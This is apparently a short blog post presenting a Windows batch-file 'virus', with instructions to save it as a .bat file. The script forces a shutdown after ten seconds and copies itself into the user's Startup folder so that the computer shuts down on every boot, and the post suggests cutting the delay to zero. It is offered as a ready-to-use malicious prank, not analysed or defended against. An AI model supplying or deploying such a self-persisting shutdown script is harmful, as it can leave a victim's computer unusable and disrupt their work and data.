this is the programe to make virus to shutdown your computer within 10 seconds in every time you start your computer
if you change /t 10 to /t 00
your computer shut down with in 00 seconds
@echo off
shutdown /s /t 10
xcopy yourfilename.bat "C:\Users\alvin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy the above code in a notepad and save it in yourfilename.bat
0 comments:
Post a Comment